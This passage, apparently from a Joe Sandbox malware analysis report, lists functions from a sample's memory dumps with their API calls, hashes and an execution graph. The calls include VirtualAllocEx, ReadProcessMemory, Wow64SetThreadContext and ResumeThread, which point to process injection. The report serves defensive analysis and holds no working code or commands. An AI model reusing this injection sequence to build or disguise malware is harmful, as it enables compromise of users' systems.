              • Opcode ID: a50de2cf7584ae5ba1276c9d1b13e369fffc74de6a0121456a33febb5cd4d3d4
              • Instruction ID: 3e2440abd287ce511f91682aaf5e69719da59b4bfd1398938787c024f7aca80e
              • Opcode Fuzzy Hash: a50de2cf7584ae5ba1276c9d1b13e369fffc74de6a0121456a33febb5cd4d3d4
              • Instruction Fuzzy Hash: 732148B1C002499FCB10DFAAC885BEEFBF5FF48310F108429E519A7250CB78A940CBA1
              Function 06ADA7D8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
              Download Yara Rule
              APIs
              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ADA856
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: ContextThreadWow64
              • String ID:
              • API String ID: 983334009-0
              • Opcode ID: 1aba7fe90e92cb884178a0482e5251e9d6ab2764899d6c9ec050a7478baae4a5
              • Instruction ID: b3f4f97ab8a2c5adfd6f22e53db210a61ea3fd52d00fee80e62e34b15cc315e1
              • Opcode Fuzzy Hash: 1aba7fe90e92cb884178a0482e5251e9d6ab2764899d6c9ec050a7478baae4a5
              • Instruction Fuzzy Hash: 1D2127B1D003498FDB10DFAAC4857EEBBF4EF88314F54842AD919A7240CB78A945CFA1
              Function 06ADAA60 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
              Download Yara Rule
              APIs
              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06ADAAE0
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: MemoryProcessRead
              • String ID:
              • API String ID: 1726664587-0
              • Opcode ID: 083eb40458f089a2dc051b69a6c5953dfa592608c3d3bd638065f37ee8ec6279
              • Instruction ID: 3b3ddd530b6ce61367eda8003ebe6ae10f1b69a9cec775cfa49fb27329a7a75a
              • Opcode Fuzzy Hash: 083eb40458f089a2dc051b69a6c5953dfa592608c3d3bd638065f37ee8ec6279
              • Instruction Fuzzy Hash: 8A2137B1C003599FCB10DFAAC981AEEFBF5FF48310F50842AE519A7250CB789944CBA1
              Function 06ADA8A9 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
              Download Yara Rule
              APIs
              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06ADA91E
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: be4ae279f42eb454c0b8544a21c4da28c31d5f4ba9331b499f1b3cbce0dac53b
              • Instruction ID: ed2dc9e0ab681c951b82fa627b78573dd6d6467e52be633e096b9e8d439286d8
              • Opcode Fuzzy Hash: be4ae279f42eb454c0b8544a21c4da28c31d5f4ba9331b499f1b3cbce0dac53b
              • Instruction Fuzzy Hash: 3F1147758002499FCB20DFAAC845BEEBFF5EF88314F108419E519A7250CB399540CBA1
              Function 0087A150 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0087B099,00000800,00000000,00000000), ref: 0087B2AA
              Memory Dump Source
              • Source File: 00000000.00000002.2029681268.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_870000_SecuriteInfo.jbxd
              Similarity
              • API ID: LibraryLoad
              • String ID:
              • API String ID: 1029625771-0
              • Opcode ID: 82a7d692b862929ff871b3c9036789dd6169a812e53c39d5d7e8ef4c38782e99
              • Instruction ID: 53c566fcc10512aa9c259223e6f7fcaf31ac0f55c6c02571ff321fd9b68cdab1
              • Opcode Fuzzy Hash: 82a7d692b862929ff871b3c9036789dd6169a812e53c39d5d7e8ef4c38782e99
              • Instruction Fuzzy Hash: 881126B68003099FDB10CF9AC444BDEFBF5FB88310F10842AD519A7210C379A945CFA5
              Function 0087B239 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0087B099,00000800,00000000,00000000), ref: 0087B2AA
              Memory Dump Source
              • Source File: 00000000.00000002.2029681268.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_870000_SecuriteInfo.jbxd
              Similarity
              • API ID: LibraryLoad
              • String ID:
              • API String ID: 1029625771-0
              • Opcode ID: ecc81f59c261249a96f68075dae87366c93a6aedde0e7a057ade70679a6bb2ce
              • Instruction ID: 680332e8220f8ae5d35a01af444f7076468c4d5a68ac987e5269d2f6e7bda4d2
              • Opcode Fuzzy Hash: ecc81f59c261249a96f68075dae87366c93a6aedde0e7a057ade70679a6bb2ce
              • Instruction Fuzzy Hash: 371126B68002498FDB10DF9AC484BDEFBF5FF88310F14842AD919A7211C379A945CFA5
              Function 06ADA8B0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
              Download Yara Rule
              APIs
              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06ADA91E
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: 8c3831ea7a260684d8dbf0cf20ba8db693d562be520b2021ea108a6411fae4aa
              • Instruction ID: 7aed09830420c733666860130382d480213ff728f32279494244545056eea25b
              • Opcode Fuzzy Hash: 8c3831ea7a260684d8dbf0cf20ba8db693d562be520b2021ea108a6411fae4aa
              • Instruction Fuzzy Hash: F81137758002499FCB10DFAAC845BEEBFF5FF88314F108419E519A7250CB79A940CFA1
              Function 06ADA720 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: ResumeThread
              • String ID:
              • API String ID: 947044025-0
              • Opcode ID: f62cd7bea773a49356df01827c31918476b00d0cff9fd6583fbc167a64a12f7c
              • Instruction ID: 3288b7353324980982f920cadf2d369754568bcff05c88411f32b10d8e84f987
              • Opcode Fuzzy Hash: f62cd7bea773a49356df01827c31918476b00d0cff9fd6583fbc167a64a12f7c
              • Instruction Fuzzy Hash: AB1158B5D003089FCB20EFAAC4457EEFBF5EF88310F208429D519A7240CB39A944CBA4
              Function 06ADA728 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: ResumeThread
              • String ID:
              • API String ID: 947044025-0
              • Opcode ID: 894f93fe089ff5bafd8389a12aae8c7f4d293f07ea48e31b85dab935e1fd72e9
              • Instruction ID: 86346b5422cdd8d9aa6245d69e3d9b89f4fa59a7d42d496b0169378fd651215b
              • Opcode Fuzzy Hash: 894f93fe089ff5bafd8389a12aae8c7f4d293f07ea48e31b85dab935e1fd72e9
              • Instruction Fuzzy Hash: 54113AB1D002488FDB20DFAAC4457EEFBF5EF88314F208419D519A7240CB79A544CBA5
              Function 06ADE0E0 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
              Download Yara Rule
              APIs
              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06ADE145
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              • Opcode ID: 43f34b91d69a450e9a83dfb93d2fb10de826eb78826112bc81fbe36ecef89fbd
              • Instruction ID: a29aaa7d920b02dde603f790cbf852a06df8b66b2e35e918ad90a755f66fae0d
              • Opcode Fuzzy Hash: 43f34b91d69a450e9a83dfb93d2fb10de826eb78826112bc81fbe36ecef89fbd
              • Instruction Fuzzy Hash: E91110B68002499FCB11DF9AC885BDEBBF8FB48324F108459E528A7250C378A940CFA1
              Function 0087AFB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
              Download Yara Rule
              APIs
              • GetModuleHandleW.KERNELBASE(00000000), ref: 0087B01E
              Memory Dump Source
              • Source File: 00000000.00000002.2029681268.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_870000_SecuriteInfo.jbxd
              Similarity
              • API ID: HandleModule
              • String ID:
              • API String ID: 4139908857-0
              • Opcode ID: a9d551ed71f8c8e6413da7735de08264632dbd8cda7b6acd0ceaf4480001e3a1
              • Instruction ID: a06294d8847c8d095b35356ff1e41cadb9fdc9eee0e581c0d977692ef0b11675
              • Opcode Fuzzy Hash: a9d551ed71f8c8e6413da7735de08264632dbd8cda7b6acd0ceaf4480001e3a1
              • Instruction Fuzzy Hash: BC11DFB5C006498FDB20DF9AD444BDEFBF5FB88314F10842AD529A7214D379A545CFA1
              Function 06ADC1CC Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
              Download Yara Rule
              APIs
              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06ADE145
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              • Opcode ID: 8a128ea5798f5d06a1a91b61faa0ad2c52993767e66fbc2a1f142798341ded66
              • Instruction ID: f2fd6623a27f89dd1a284e2b391c99602b775116c61878818da2de695e176023
              • Opcode Fuzzy Hash: 8a128ea5798f5d06a1a91b61faa0ad2c52993767e66fbc2a1f142798341ded66
              • Instruction Fuzzy Hash: 0411F2B58003499FDB60DF9AC885BDEBBF8FB48310F10841AE519A7200C379A944CFA5
              Function 0081D4C4 Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2029468798.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_81d000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aa064852e1c0bed6f1bd4af6d0abd53c91a6add9cdde15f57a59e0489b0c32fa
              • Instruction ID: 81652b32e922e98221dcc66ee224107a80298dcf18517d9cd08fda89a4bb3187
              • Opcode Fuzzy Hash: aa064852e1c0bed6f1bd4af6d0abd53c91a6add9cdde15f57a59e0489b0c32fa
              • Instruction Fuzzy Hash: C6210371500344DFCB15DF14D9C0FA6BF6AFF98318F20C569E9098B256C33AD896DAA2
              Function 0081D3D8 Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2029468798.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_81d000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0214706e38216ff53403946c932dedda09288e8c13085b76f1c8e0962a32dc3a
              • Instruction ID: b07ef6a066113149ed3619b28da39227b743cd7d42d29e1f9e980652fd4c3762
              • Opcode Fuzzy Hash: 0214706e38216ff53403946c932dedda09288e8c13085b76f1c8e0962a32dc3a
              • Instruction Fuzzy Hash: 70210671500304DFDB05DF14D9C0B56BF69FF98314F20C569E9098B256C33AE896D7A2
              Function 0082D1D4 Relevance: .1, Instructions: 72COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2029515038.000000000082D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_82d000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fc473e910d530a7a33aeb75636709a62caa995f535e82e26276dfc00fda89445
              • Instruction ID: 43c37240f04e6e57a935ea32a25c6d08cb8674c31678e96dc031119080ffc464
              • Opcode Fuzzy Hash: fc473e910d530a7a33aeb75636709a62caa995f535e82e26276dfc00fda89445
              • Instruction Fuzzy Hash: A621F571504304EFDB05DF14E5C0B26BFA5FB84314F20C56DD9098B256C33AE886CA61
              Function 0082D01C Relevance: .1, Instructions: 72COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2029515038.000000000082D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_82d000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 750896bd3c41e49e590e5289dfc40c897d775b5c91813f88d5c08378b360479e
              • Instruction ID: 30abcd788c9932c1e5cc79f476fac0539ba3662b6b64205c15688cf5262c7a65
              • Opcode Fuzzy Hash: 750896bd3c41e49e590e5289dfc40c897d775b5c91813f88d5c08378b360479e
              • Instruction Fuzzy Hash: 3A21F271604744DFCB14DF24E984B26BF65FB88314F20C569D94A8B3A6C33AD887CAA1
              Function 0081D3D3 Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2029468798.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_81d000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
              • Instruction ID: e9c012e31079974d01c5059321bbd4f6f813f5ceeef44f05e0a49f58fa029e5f
              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
              • Instruction Fuzzy Hash: A111DF72404340CFCB16CF00D5C4B56BF71FB98324F24C6A9D9094B256C33AE85ACBA2
              Function 0081D4BF Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2029468798.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_81d000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
              • Instruction ID: 8dc1ce435c2f61966a31dc9f64e3bd0faa854ae5e06481acf88cd0d81c4908ad
              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
              • Instruction Fuzzy Hash: 2611DF72404280CFCB06CF10D5C4B96BF72FB98314F24C6A9D8494B256C336D85ACBA2
              Function 0082D017 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2029515038.000000000082D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_82d000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
              • Instruction ID: b8d386ea37286f8ca44eef2ad48a249ccd98d9364c9f1a8cbd729bcb213b2675
              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
              • Instruction Fuzzy Hash: BB118E75504780DFDB15CF14E5C4B15BF61FB44314F24C6A9D8498B666C33AD84ACB62
              Function 0082D1CF Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2029515038.000000000082D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_82d000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
              • Instruction ID: 37858e9299bb3ee5ea3b2c6b8e946a08a5aeebca685a259554d6677c12e1fd08
              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
              • Instruction Fuzzy Hash: 3A118B75504380DFDB16CF14D5C4B15BFA2FB84314F24C6A9D8498B696C33AE84ACB62

              Non-executed Functions

              Function 02670040 Relevance: .3, Instructions: 315COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2030753809.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2670000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 07a814178dbdc98e96494379dfebaa9bdc162ffd86c339707b8f8a39c71ae192
              • Instruction ID: ca29c3b2c3e10d56d1821c8ed0868643423558d3b777867850a23d44b06a32ed
              • Opcode Fuzzy Hash: 07a814178dbdc98e96494379dfebaa9bdc162ffd86c339707b8f8a39c71ae192
              • Instruction Fuzzy Hash: E21286B0881F458ED710CFA5E94C1893B71B751318BF04A19D2617B2E5FBB8266EEF48
              Function 06AD8420 Relevance: .3, Instructions: 312COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2372f0f1d739d6152e26c4e112f0e0f964e4ad9b8714c48a268ff95f021ff64f
              • Instruction ID: cf653ebc8be4358952c42035aef4690b4a70a76f53e5f19e41abb4692981cf02
              • Opcode Fuzzy Hash: 2372f0f1d739d6152e26c4e112f0e0f964e4ad9b8714c48a268ff95f021ff64f
              • Instruction Fuzzy Hash: 59E12B74E001198FCB54DFA9C5809AEFBF2FF89305F248169E415AB35AD734A981CFA1
              Function 06AD7FE8 Relevance: .3, Instructions: 312COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a9522136546f6fdb5cccebaf516f6ed99039cebd4e385f8fb846176a7753e743
              • Instruction ID: 11cb2d895f390b6f28e5ae2e124467edfe40c515c70dd8f9adddf6102e9cf901
              • Opcode Fuzzy Hash: a9522136546f6fdb5cccebaf516f6ed99039cebd4e385f8fb846176a7753e743
              • Instruction Fuzzy Hash: C8E12A74E001198FCB54DFA9C5809AEFBB2FF89305F248169E415AB35AD734A981CFA1
              Function 06AD9F00 Relevance: .3, Instructions: 312COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 429e629eef41deed4562c77a6f386de72f05f23bd5139b37cf5e25060de53775
              • Instruction ID: ae4eec2b88ce81d6918443b1b99ce2537d533302f05eceeaafd5d63e7fa5f9f1
              • Opcode Fuzzy Hash: 429e629eef41deed4562c77a6f386de72f05f23bd5139b37cf5e25060de53775
              • Instruction Fuzzy Hash: 8AE13A74E002198FCB54DFA9C5809AEFBB2FF89305F24C169E515AB31AC731A941CFA0
              Function 06AD9AC8 Relevance: .3, Instructions: 312COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 654f72fdcf09dd2d138062bc8c77f3dbc779a0ccca5def40a24c27276c423dc5
              • Instruction ID: b57cdcbb09e07414eaaa40bcce9a0edbe5ee1187b7243d9db9b318fa08dad60c
              • Opcode Fuzzy Hash: 654f72fdcf09dd2d138062bc8c77f3dbc779a0ccca5def40a24c27276c423dc5
              • Instruction Fuzzy Hash: E2E12C74E002198FCB54DFA9C5809AEFBF2FF89305F249169D415AB35AD730A941CFA1
              Function 06AD7BB0 Relevance: .3, Instructions: 312COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1a5077701cd4d37a071ee612920afcb16f6152ce5b7ce9a076371102c8f42cd7
              • Instruction ID: 8679ce88c650a2bf9d0c770754e6cfbff2d90f9a083af9b7ba159432aed09c0c
              • Opcode Fuzzy Hash: 1a5077701cd4d37a071ee612920afcb16f6152ce5b7ce9a076371102c8f42cd7
              • Instruction Fuzzy Hash: 01E11A74E001198FCB54DFA9C5809AEFBF2FF89305F249169E415AB35AD730A941CFA1
              Function 06AD03C8 Relevance: .3, Instructions: 270COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 172695161be4d9e3956419085a94d1be4066f271565641074e2e38f2f06bc22e
              • Instruction ID: 369e456d13bc9de260ff7b2645d5aabe51e7878964584a88c9cd8b055cd22aba
              • Opcode Fuzzy Hash: 172695161be4d9e3956419085a94d1be4066f271565641074e2e38f2f06bc22e
              • Instruction Fuzzy Hash: 09D14D31D20A5A8ADB01EF68D950ADDB7B5FFD5300F10979AD40977224EB706AC9CF81
              Function 0087D5DC Relevance: .3, Instructions: 264COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2029681268.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_870000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9e38afd8cda3d3748d14e818f773609011c667a285941152bdf7a798a3c47b38
              • Instruction ID: f30f9fca19873f5b5dbad5b8607f8001053157e50820302c77ace0ab9ab9bd4b
              • Opcode Fuzzy Hash: 9e38afd8cda3d3748d14e818f773609011c667a285941152bdf7a798a3c47b38
              • Instruction Fuzzy Hash: 36A14C36E00609CFCF09DFA5C84059EB7B2FF85304B25857AE909EB26ADB31E955CB50
              Function 06AD0400 Relevance: .3, Instructions: 264COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5b428032d30a54a32f70ff0e312f5a8a7184e8a3a011e535f8815383edb4e6fd
              • Instruction ID: 7e0e95f975db68ad0cbfa5c218c7dcfb0881fe7ef21a25407a8e386300b865f0
              • Opcode Fuzzy Hash: 5b428032d30a54a32f70ff0e312f5a8a7184e8a3a011e535f8815383edb4e6fd
              • Instruction Fuzzy Hash: 3AD11B31D20A1A8ADB01EFA8D950A9DB7B5FFD5300F10D79AD50977224EB706AC9CF81
              Function 06AD03FF Relevance: .3, Instructions: 264COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d9832bf32f470e9ff9f9f3ac58b58f4fd02bf230f8ac52d4676391d521f88b4a
              • Instruction ID: c484c517e0f3fb69041ebca11b5d2a346cf8054d3ad10ca0c9ba154e8d77c3ae
              • Opcode Fuzzy Hash: d9832bf32f470e9ff9f9f3ac58b58f4fd02bf230f8ac52d4676391d521f88b4a
              • Instruction Fuzzy Hash: A7D11B31D20A1A8ADB01EFA8D950A9DB7B5FFD5300F10D79AD50977224EB706AC9CF81
              Function 02670013 Relevance: .2, Instructions: 235COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2030753809.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2670000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8fc17e746f1d9d7b9e6a5aebc5aee68d5ed53ed3b933260efc6a30caa7b726ee
              • Instruction ID: a32f7bb190edc15277f4cd2a0ca54cb83d7f7bceb9880eb459c06683baf4e5dd
              • Opcode Fuzzy Hash: 8fc17e746f1d9d7b9e6a5aebc5aee68d5ed53ed3b933260efc6a30caa7b726ee
              • Instruction Fuzzy Hash: 49C11BB0C80B458FD711CFA5E8481897BB1BB95314BB04A19D1617B2D1FBB8366EEF48
              Function 06AD9AB8 Relevance: .2, Instructions: 164COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 49598fb43a9b89b4dd8a58e034ab253246c35e2d9a70e4a35eee1e9f471305b9
              • Instruction ID: 1cb48289879ea0c8c27e75518f38079897352d16e7f8db89d4ded2d1410408ba
              • Opcode Fuzzy Hash: 49598fb43a9b89b4dd8a58e034ab253246c35e2d9a70e4a35eee1e9f471305b9
              • Instruction Fuzzy Hash: 93616075E042198FDB54DFA9C9405AEFBF2EF89300F14816AD419AB366C730A942CFA1

              Execution Graph

              Execution Coverage:10.2%
              Dynamic/Decrypted Code Coverage:100%
              Signature Coverage:0%
              Total number of Nodes:43
              Total number of Limit Nodes:2
              execution_graph 27354 d3d044 27355 d3d05c 27354->27355 27356 d3d0b6 27355->27356 27359 5648a81 27355->27359 27367 564390c 27355->27367 27360 5648a9d 27359->27360 27361 5648b09 27360->27361 27363 5648af9 27360->27363 27364 5648b07 27361->27364 27385 5647b24 27361->27385 27375 5648c20 27363->27375 27380 5648c30 27363->27380 27368 5643917 27367->27368 27369 5648b09 27368->27369 27372 5648af9 27368->27372 27370 5648b07 27369->27370 27371 5647b24 CallWindowProcW 27369->27371 27371->27370 27373 5648c20 CallWindowProcW 27372->27373 27374 5648c30 CallWindowProcW 27372->27374 27373->27370 27374->27370 27376 5648c3e 27375->27376 27377 5647b24 CallWindowProcW 27376->27377 27379 5648c46 27376->27379 27378 5648c84 27377->27378 27378->27364 27379->27364 27381 5648c3e 27380->27381 27382 5647b24 CallWindowProcW 27381->27382 27384 5648c46 27381->27384 27383 5648c84 27382->27383 27383->27364 27384->27364 27386 5647b2f 27385->27386 27387 5648d32 CallWindowProcW 27386->27387 27388 5648ce1 27386->27388 27387->27388 27388->27364 27389 5647858 27390 564789e 27389->27390 27394 5647e40 27390->27394 27397 5647e31 27390->27397 27391 564798b 27400 56476bc 27394->27400 27398 5647e6e 27397->27398 27399 56476bc DuplicateHandle 